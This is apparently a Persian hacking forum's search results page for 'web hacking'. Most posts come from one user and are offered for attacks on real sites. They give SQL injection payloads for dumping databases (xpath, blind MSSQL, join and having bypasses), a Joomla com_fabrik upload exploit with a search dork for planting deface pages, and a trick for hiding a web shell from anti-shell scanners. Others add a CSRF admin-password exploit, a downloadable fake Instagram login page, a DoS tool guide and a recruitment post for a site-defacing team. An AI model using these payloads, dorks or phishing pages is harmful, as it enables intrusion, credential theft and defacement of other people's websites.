discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'web hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

24 نتیجه پیدا شد

  1. با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @sign4l 4-@mbdev12 5- @HCSH4C39 6- @mmj-sys مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
  2. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
  3. MR.MSA

    آموزش ابزار john

    با سلام خدمت کاربران و مدیران عزیز در این تاپیک برای شما یک ویدئو آماده کردم که ابزار john رو آموزش دادم . دو تا از حالت های پر کاربرد رو آموزش دادم امیدوارم اذت ببرید . از این ابزار می توانید برای گسترش پسورد لیست و کرک هش و ... استفاده کنید . امیدوارم لذت برده باشید و اگه لایک کنید ابزار های بیشتری رو قرار می دم . پیروز و سربلند باشید 😆.
  4. با سلام خدمت شما دوستان عزیز در این تاپیک قصد دارم ابزار Hammer که برای حملات dos و ddos استفاده می شود رو به شما آموزش بدهم . برای شما یک ویدئو آموزشی آماده کردم : در فایل ضمیمه برای شما آموزش تصویری رو آماده کردم تا بتوانید بهتر این ابزار رو یاد بگیرید . فرمت : PDF به شما هم آموزش ویدئویی رو پیشنهاد می کنم و هم آموزش تصویری ، پیروز باشید 😁 Hammer Image.pdf
  5. MR.MSA

    برسی مرورگرها

    با سلام خدمت دوستان عزیز در این تاپیک قصد دارم که مرورگر ها رو باهم برسی کنیم . این روز ها شاید بعضی هکر ها بین چند مرورگر اختلاف نظر داشته باشند برای همین باهم اینجا این ها رو برسی میکنیم . ما می خواهیم مرورگرهای کروم ، فایرفاکس ،‌ تور و اپرا رو برسی کنیم که جز قوی ترین مرورگر ها هستند و بین ما هکر ها محبوبیت دارد ، خب بریم برسی رو شروع کنیم . اولین مرورگر یعنی Google Chrome ‌: همانطور که می دانید کروم متعلق به شرکت گوگل هست و گوگل یک موتور جستوجو قوی هست و بیشتر هکر ها از google استفاده می کنند به خاطر دورک ، امنیت ، سرعت و.... گوگل كروم به عنوان يكی از پركاربردترين مرورگرها در سراسر جهان شناخته می‌شود و بین خیلی ها محبوبیت دارد . از جمله ویژگی های کروم می توانیم اشاره کنیم به : سازگاری خوب با گوگل و نسخه های مختلف سرعت خوب و سازگاری با سیستم عامل های Windows، macOS، Linux، Android، iOS افزونه های بسیار زیاد و نرم افزار های افزودنی که داره جذابش می کنه (اما بعضی افزونه ها خوب کار نمی کند ) توضیحات : Chrome 79 به هیچ وجه مرورگر بدی نیست و پشتیبانی و همگام سازی متقابل پلتفرم ، ویژگی های خودکار کامل و برخی ابزار های خوب عالی برای توسعه دهندگان وب است . این می تواند به شما هشدار دهد اگر ایمیل شما به خطر بیفتد، از جستجوی DNS مطمئن برای ارائه دهندگان سازگار برخوردار است (خود DNS عمومی Google یکی از آنهاست) و بسیاری از محتوای مخلوط خطرناک مانند اسکریپت ها و تصاویر را در اتصالات غیرقابل اطمینان مسدود می کند. همچنین WebXR API را برای AR و VR فعال می کند. و .... نکات مثبت مرورگر کروم : حالت تاریک Chrome یک نکته مثبت است که می توانم بهش اشاره کنم . گوگل کروم به طور مداوم در لیست امن ترین مرورگرها قرار دارد و همانطور که گفتم و خبر دارید امنیت بسیار بالایی دارد. در تست های هک عملکرد خوبی دارد و بروزرسانی های مداوم و ماهیانه ای که داره شما رو بروز قرار می دهد. در مسابقات سالانه هک کردن Pwn2Own در چندین نوبت (و همچنین جوایز امنیتی دیگر) بخش “امن ترین مرورگر” را به دست آورد. نکات بدی که داره : عمده موارد مربوط به حریم خصوصی ، برنامه های افزودنی مرورگر می تواند باعث ایجاد مشکلات امنیتی و ... شود . میرویم سراغ مرورگر دوم یعنی Firefox : مرورگر فایر فاکس یک مرورگر محبوب در سرار جهان است که بیشتر خود ما ایرانی ها از این مرورگر استفاده می کند ، من هکر های زیادی رو تا به حال دیدم که از فایرفاکس استفاده می کنند ، فایرفاکس رقیب کروم هست و توی امنیت خیلی خوب خودش رو ثابت کرده است . از جمله ویژگی ها می توانیم اشاره کنیم به سرعت بالا مرورگر افزونه ها و ابزار های افزودنی افزونه های مورد استفاده در هک مثل hackbar و live http header (در کروم هم موجود هستند) نسخه های مختلف مرورگر ، برای توسعه دهندگان وب و درميان توسعه‌هندگان فايرفاكس احتمالا محبوب‌ترين مرورگر جهان است. با استفاده از این مرورگر میتوانید به یک خطایاب جاوا اسکریپت دست پیدا کنید. به علاوه ، با نسخه توسعه دهنده فايرفاكس ، شما به موتور CSS نسل بعد (نوشته شده در RUST) دسترسی پيدا خواهيد كرد ، يک سيستم CSS غيرفعال كه اعلان‌هايی كه بر روی صفحه اثر ندارد را غيرفعال می‌كند، و مواردی بيش از اين هم ارائه می‌كند. همچنين یک هاست “Firefox DevTool” برای دسترسی بهتر وجود دارد . پیشنهاد می کنم که اگر از مرورگر فایرفاکس یا کروم استفاده می کنید برای امنیت بالاتر در مرورگر خود از افزونه LastPass برای ذخیره پسورد ها تون استفاده کنید . سعی کردم بیشتر توضیحات رو بدم و امیدوارم لذت برده باشید . شاد باشید 😅
  6. MR.MSA

    جلوگیری از باگ RFU

    با سلام خدمت کاربران و مدیران عزیز گارد ایران در این پست قصد دارم به شما نحوه پچ باگ RFU بدم . RFU : Remote File Upload یک توضیح مختصر : هنگام اپلود یک فایل در سرور این اسیب پذیری به وجود می اید که هکر فایل مخرب خودش رو در سرور آپلود می کند (shell) به صورت کلی این اسیب پذیری بسیار خطر ناک است و باعث می شود که هکر دسترسی کامل به سایت بگیرد ولی حالت های دیگری هم وجود دارد که خطر این باگ کمتر می شود مثلا هکر نمی تواند فایل php خودش که شل است رو آپلود کنه به جای آن فایل html خودش که دیفیس پیج است رو آپلود می کنه یه کمی توضیح طولانی شد خب حالا میریم سراغ جلو گیری از باگ RFU در کد نویسی اولین قدم باید فایل ها در یک جای مشخص و خاص باشد می توانید از این دستور استفاده کنید : move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); الان فایل های اپلودی در فولدری به نام Guardiran قرار می گیرند . حالا برای اینکه فایل های php قابل آپلود نباشند : if(end(explode('.',$_FILES['upload']['name'])) !== 'php'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } تا الان آپلودر ما کمی وضعیتش بهتر شده بعضی از سایت ها از این فیلترینگ استفاده می کنند ولی امنیت بسیار پایینی دارد چون زبان php به حروف بزرگ و کوچک حساس است یعنی ما گفتیم با در آخر نام ... php نباشد اما برای مثال هکر با این نام اپلود می کند b374k.PHP که هر دو فرمت php هستند اما از نظر حروف کوچک و بزرگ باهم فرق دارند پس کد های خودمون رو تغییر می دهیم . به این صورت : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } الان یک اپلودر با امنیت خوب داریم ولی هنوز با بایپس ها و متد و... امکان دور زدن وجود دارد پس امنیت رو بالا تر می بریم تا کار هکر سخت تر شود . کاری می کنیم که هکر به راحتی فایل خودش رو پیدا نکنه و از تابع rand استفاده می کنیم و کد ها رو به این صورت می نویسیم :‌ if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ $ch = rand(); move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$ch}.jpg"); }else{ } می توانید بعد از else (در غیر این صورت ) خطای خود را با html و css طراحی کنید . چند راه پیشنهادی جهت رفع بهتر باگ RFU : بهتر است که از یک سرور اختصاصی استفاده کنید و فایل های اپلودی خودتون رو در یک سرور دیگر آپلود کنید . دایرکتوری فایل های اپلود با دایرکتری فایل های اصلی متفاوت باشد . امیدوارم از این پست لذت برده باشید . Download Uploader.zip
  7. با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . Xpath injection کاربرد : 1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید . 2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید . 3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد . 4. و..... -------------- -------------- -------------- روش استفاده از متد xpath اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و .... اگر مشکل حل نشد به سراغ این متد میاید . آموزش متد xpath : بدست اوردن ورژن : …..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))-- 0x7e به معنای علامت (~) است . version() به معنای ورژن سایت است. در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  8. با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌) 99 ‌< true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99 = load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  9. MR.MSA

    متد Fabrik

    Fabrik موارد قابل استفاده : در سایت های جوملا قابل استفاده است . یکی از زیر مجموعه های RFI در سایت هایی که این ادرس را دارند (دورک): index.php?option=com_fabrik ....و Dork : inurl:index.php?option=com_fabrik مراحل متد :‌ ۱ ) دورک را بزنید و یک سایت را انتخاب کنید و اگر صفحه بدون خطای ۴۰۴ ، ۴۰۱ و ۵۰۰ لود شد یعنی به احتمال زیاد این باگ را دارد . (مطمئن شوید که سایت با cms جوملا هست ) ۲) این اکسپلویت را به ادرس سایت اضافه کنید . Exploit : index.php?option=com_fabrik&c=import&filetype=csv&tables=1 ۳) سپس فایل خود را آپلود کنید .( اون فایل می توانید دیفیس پیج شما باشد . ) ۴) این ادرس را به سایت اضافه و به جای (FILE_NAME) نام فایل خودتان را بنویسید . /media/(FILE_NAME)
  10. MR.MSA

    Download Keyword

    برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
  11. با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
  12. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
  13. MR.MSA

    بایپس آنتی شل

    با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
  14. با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . سطح : متوسط تفاوت mssqli و mysql : Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد . ------------------------------------------------------------------------------------------------------------------------ تست آسیب پذیری ‌: به ادرس سایت ‘a را اضافه کنید . به این صورت : Site.com/news.aspx?id=4’a و با دریافت خطا یعنی سایت اسیب پذیر است . ------------------------------------------------------------------------------------------------------------------------ بیرون کشیدن اطلاعات اولیه : روش اول : Site.com/news.aspx?id=4+and+1=(convert(int,x)) روش دوم : Site.com/news.aspx?id=4+or+1=(convert(int,x)) و به جای x می توانید این مقادیر بزنید ‌: user db_name @@servername @@version Host_@@version Host_name و.... ------------------------------------------------------------------------------------------------------------------------ برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید . امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم .
  15. با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم . متد separator‌ : در زمان مرتب سازی تیبل ها ، ستون ها و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید : ..........(group_concat(table_name,0x3c62723e...... حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت : .......( group_concat((table_name)separator 0x3c62723e...... زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد . ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید .
  16. MR.MSA

    اکسپلویت باگ CSRF

    با سلام خدمت دوستان عزیز گارد ایران من MR.MSA در این تاپیک قصد دارم یک اکسپلویت در باگ CSRF رو به شما معرفی کنم و کمی توضیح درباره این باگ برای مبتدی ها ، با من همراه باشید . -------------------- CSRF : Cross Site Request Forgery نکات باگ : معنی شده آن جعل درخواست است . این باگ را کرم تحت وب می شناسند و اثر بدی دارد . این باگ توسط سایت و فایروال شناسایی نمی شود . -------------------- نحوه حمله : این حمله به طوری است که ما با استفاده از جعل کوکی admin سایت می توانیم درخواست های جعلی بدهیم . -------------------- انجام حمله : قدم اول : گوگل دورک Google Dork : inurl:admin/admin.php Travel PORTAL ---------- قدم دوم : اکسپلویت به این ادرس بروید و اکسپلویت رو با پسوند html ذخیره کنید . exploit : https://www.exploit-db.com/exploits/15280 ---------- قدم سوم : به جای http://VICTIM/admin/admin.php آدرس سایت خود را بزنید => http://guardiran.org/admin/admin.php قدم چهارم : رمز جدید خود را بزنید . ----------------------------- امید وارم از این تاپیک لذت برده باشید و اکسپلویت مورد تایید شما قرار گرفته باشه . اگه مشکلی داشت به خوبی خودتون ببخشید سعی کردم تاپیک رو جوری بنویسم که همه بتوانند استفاده کنند . ******************** MR.MSA ***************** <------------------------MR.MSA----------------------> -------- پیج فیک ------- <صفحه لاگین اینستاگرام (فیک)> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <افزونه whatruns (جمع آوری اطلاعات سایت)> <------------------------MR.MSA----------------------/>
  17. MR.MSA

    پیج فیک اینستاگرام

    با سلام خدمت تمام کاربران و مدیران GUARDIRAN در این تاپیک قصد دارم یک پیج فیک اینستاگرام رو به شما دوستان عزیز بدم . فقط دوستان توجه داشته باشید که باید هر چیزی که بین این کامنت هست رو حذف کنید : <!--***************************** MR.MSA *****************************--> برای دانلود به فایل پیوست مراجعه کنید . --------------------- امید وارم از این پست لذت برده باشید و از فیک پیج اینستاگرام استفاده کرده باشید . یه مشکلات ریز داشت یه خوبی خودتون ببخشید . ******************** MR.MSA ***************** Fake Page Instagram.zip
  18. با سلام خدمت انجمن گارد ایران من MR.MSA در این تاپیک قصد دارم یک افزونه دیگر تحت عنوان WhatRuns رو به شما معرفی کنم این افزونه هم یک اسکنر مانند افزونه wappalyzer است که برای جمع آوری اطلاعات بدرد بخور است . سایت افزونه => https://www.whatruns.com‏ ----------------------------- بخش های جمع آوری اطلاعات و مهم WhatRuns که هنگام اسکن به شما نمایش داده می شود : - CMS - CDN - Font Script - Javascript Graphics - Web Framework - Message Board - Web Server - Rich Text Editors - Font - Javascript Frameworks - Database - Dev Tools - Message Board - Analytics - و.. ----------------------------- نکات قابل توجه : توجه داشته باشید که تمامی بخش های بالا شامل تمامی سایت ها نمی باشد چون بعضی سایت ها هستند که اطلاعات کمی می توان از آن ها بدست آورد . این افزونه سرعت نسبتا خوبی برای اسکن و انالیز سایت ها دارد و من خودم از این افزونه استفاده می کنم . ----------------------------- میزان خطای افزونه : تقریبا بین ۵ تا ۱۵ درصد میزان خطای این افزونه است . می توان گفت افزونه WhatRuns میزان خطای کمی نسبت به افزونه های دیگر دارد . ----------------------------- لینک دانلود افزونه WhatRuns : Chrome FireFox --------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو گذاشته باشم و از افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <------------------------MR.MSA----------------------> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <------------------------MR.MSA----------------------/>
  19. با سلام خدمت شما کاربران و مدیران عزیز انجمن Guardiran من MR.MSA در این تاپیک قصد دارم یک افزونه WordPress Theme Detector and Plugin Detector برای اسکن سایت های وردپرسی را به شما معرفی کنم . ---------------------------------------------------------- ویژگی ها : نوع پوسته (them) سایت افزونه های معروف استفاده شده در سایت ورژن تم و پلاگین های سایت ---------------------------------------------------------- نکات قابل توجه : این افزونه برای بعضی از سایت های وردپرسی خوب جواب نمی دهد ولی در بعضی سایت ها بدرد بخور هست. برای ورژن تم و پلاگین خوب عمل می کند . مشکلی که این افزونه دارد این است که سرعت اسکن پایینی دارد. ---------------------------------------------------------- میزان خطا افزونه : تقریبا بین ۳۰ تا ۴۰ درصد میزان خطای این افزونه است.(طبق برسی من ) ---------------------------------------------------------- دانلود افزونه WordPress Theme Detector and Plugin Detector : Chorme FireFox ---------------------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو گذاشته باشم و از این افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************* MR.MSA ************* <------------------------MR.MSA----------------------> ------- باگ -------- <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <نکته مهم در متد join > ----- افزونه ------ <افزونه Wapplyzer (اسکنر سایت ) > ------- نرم افزار -------- <نرم افزار ریکاوری برای مک> ------- کالی لینوکس ------ <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس > <------------------------MR.MSA----------------------/>
  20. با سلام خدمت شما دوستان عزیز سایت GUARDIRAN.ORG من MR.MSA در این تاپیک قراره است افزونه Wappalyzer رو به شما معرفی کنم . لینک دانلود در آخر پست . ---------------------------------------------------------- افزونه Wappalyzer اسکنر سایت است که با آن شما می توانید : ۱- نوع cms سایت ۲- افزونه های نصب شده در سایت ۳- زبان های برنامه نویسی استفاده شده در سایت و زبان برنامه نویسی اصلی سایت ۴- نوع دیتابیس سایت ۵- ورژن cms ، پلاگین ، زبان برنامه نویسی سایت . ۶- و..... رو بدست آورید . ---------------------------------------------------------- نکات قابل توجه : در بعضی از سایت ها افزونه توان پیدا کردن بعضی اطلاعات را ندارد بنابراین نمیشه گفت که تمامی اطلاعات را به شما می دهد ولی در بیشتر سایت ها امکان پیدا کردن اطلاعات وجود دارد . ---------------------------------------------------------- میزان خطای افزونه : میتوان گفت بین ۲۰ تا ۳۰ درصد این افزونه خطا دارد . ---------------------------------------------------------- لینک دانلود افزونه Wappalyzer : chrome Firefox ---------------------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو نوشته باشم و از افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > <نکته مهم در متد join > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  21. MR.MSA

    نکته مهم در متد join

    با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
